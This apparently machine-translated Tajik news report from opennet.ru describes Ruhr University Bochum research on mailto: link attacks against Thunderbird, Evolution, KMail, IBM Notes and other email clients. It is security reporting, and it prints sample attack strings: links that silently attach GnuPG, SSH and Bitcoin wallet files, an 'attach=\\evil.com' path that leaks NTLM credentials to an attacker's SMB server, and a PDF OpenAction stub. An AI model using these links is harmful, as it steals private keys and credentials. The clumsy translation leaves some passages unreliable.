Муҳаққиқони Донишгоҳи Рур Бохум (Олмон) () рафтори муштариёни почта ҳангоми коркарди истинодҳои "mailto:" бо параметрҳои пешрафта. Панҷ нафар аз бист муштарии почтаи электронии тафтишшуда ба ҳамлае осебпазир буданд, ки ивазкунии захираҳоро бо истифода аз параметри "замима" идора мекард. Шаш муштарии почтаи электронии иловагӣ ба ҳамлаи ивазкунии калидҳои PGP ва S/MIME осебпазир буданд ва се муштарӣ ба ҳамла барои истихроҷи мундариҷаи паёмҳои рамзшуда осебпазир буданд.
Пайвандҳо «"барои автоматикунонии кушодани муштарии почтаи электронӣ барои навиштани мактуб ба адреси дар истиноди зикршуда истифода мешаванд. Илова ба суроға, шумо метавонед параметрҳои иловагиро ҳамчун як ҷузъи истинод, ба монанди мавзӯи мактуб ва қолаби мундариҷаи маъмулӣ муайян кунед. Ҳамлаи пешниҳодшуда параметри "замима" -ро идора мекунад, ки ба шумо имкон медиҳад замимаеро ба паёми тавлидшуда замима кунед.
Мизоҷони почтаи Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) ва Pegasus Mail ба ҳамлаи ночиз, ки ба шумо имкон медиҳад ба таври худкор замима кунед, осебпазир буданд. ягон файли маҳаллӣ, ки тавассути истиноди "mailto:?attach=path_to_file" муайян карда мешавад. Файл бе нишон додани огоҳӣ замима карда мешавад, бинобар ин, бидуни таваҷҷӯҳи махсус, корбар пай набарад, ки мактуб бо замима фиристода мешавад.
Масалан, бо истифода аз истинод ба монанди "mailto:[почтаи электронӣ ҳифз карда шудааст]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" шумо метавонед калидҳои хусусиро аз GnuPG ба ҳарф гузоред. Шумо инчунин метавонед мундариҷаи ҳамёнҳои криптографиро (~/.bitcoin/wallet.dat), калидҳои SSH (~/.ssh/id_rsa) ва ҳама гуна файлҳои ба корбар дастрас фиристед. Ғайр аз он, Thunderbird ба шумо имкон медиҳад, ки гурӯҳҳои файлҳоро бо ниқоб бо истифода аз конструксияҳо ба монанди "attach=/tmp/*.txt" замима кунед.
Илова ба файлҳои маҳаллӣ, баъзе муштариёни почтаи электронӣ истинодҳоро ба нигаҳдории шабака ва роҳҳо дар сервери IMAP коркард мекунанд. Аз ҷумла, IBM Notes ба шумо имкон медиҳад, ки файлро аз феҳристи шабакавӣ ҳангоми коркарди истинодҳо ба мисли “attach=\\evil.com\dummyfile” интиқол диҳед ва инчунин параметрҳои аутентификатсияи NTLM-ро тавассути ирсоли истинод ба сервери SMB таҳти назорати ҳамлагар бозмедорад. (дархост бо корбари параметрҳои аутентификатсияи ҷорӣ фиристода мешавад).
Thunderbird дархостҳоро ба монанди "attach=imap:///fetch>UID>/INBOX>1/"-ро бомуваффақият коркард мекунад, ки ба шумо имкон медиҳанд мундариҷаро аз ҷузвдонҳои сервери IMAP замима кунед. Ҳамзамон, паёмҳои аз IMAP гирифташуда, ки тавассути OpenPGP ва S/MIME рамзгузорӣ шудаанд, пеш аз фиристодан аз ҷониби муштарии почта ба таври худкор рамзкушоӣ карда мешаванд. Таҳиякунандагони Thunderbird буданд дар бораи проблемам февраль ва дар шумора мушкилот аллакай ҳал карда шудааст (шохаҳои Thunderbird 52, 60 ва 68 осебпазир боқӣ мемонанд).
Версияҳои кӯҳнаи Thunderbird инчунин ба ду варианти дигари ҳамла дар PGP ва S/MIME, ки муҳаққиқон пешниҳод кардаанд, осебпазир буданд. Аз ҷумла, Thunderbird, инчунин OutLook, PostBox, eM Client, MailMate ва R2Mail2 мавриди ҳамлаи калидии ивазкунанда қарор гирифтанд, ки бо сабаби он, ки муштарии почта ба таври худкор сертификатҳои нави дар паёмҳои S/MIME интиқолшавандаро ворид ва насб мекунад, ки имкон медиҳад ҳамлакунанда барои ташкили иваз кардани калидҳои ҷамъиятӣ, ки аллакай аз ҷониби корбар нигоҳ дошта шудааст.
Ҳамлаи дуюм, ки Thunderbird, PostBox ва MailMate ба онҳо ҳассос аст, хусусиятҳои механизми автоматии сабти лоиҳаи паёмҳоро идора мекунад ва имкон медиҳад, ки бо истифода аз параметрҳои mailto рамзкушоиши паёмҳои рамзгузоришуда ё илова кардани имзои рақамиро барои паёмҳои худсарона оғоз кунад. интиқоли минбаъдаи натиҷа ба сервери IMAP ҳамлакунанда. Дар ин ҳамла матни рамзӣ тавассути параметри "бадан" интиқол дода мешавад ва теги "meta refresh" барои оғоз кардани занг ба сервери IMAP ҳамлакунанда истифода мешавад. Барои намуна: ' '
Барои ба таври худкор коркарди истинодҳои "mailto:" бидуни ҳамкории корбар, ҳуҷҷатҳои PDF-и махсус тарҳрезишударо истифода бурдан мумкин аст - амали OpenAction дар PDF ба шумо имкон медиҳад, ки ҳангоми кушодани ҳуҷҷат коркардкунандаи mailto-ро ба таври худкор оғоз кунед:
% PDF-1.5
1 0 объект
<< /Намуди /Каталог /OpenAction [2 0 R] >>
endobj
2 0 объект
<< /Намуди /Амал /S /URI/URI (mailto:?body=——ПАЁМИ PGP-ро оғоз кунед——[…])>>
endobj
Манбаъ: opennet.ru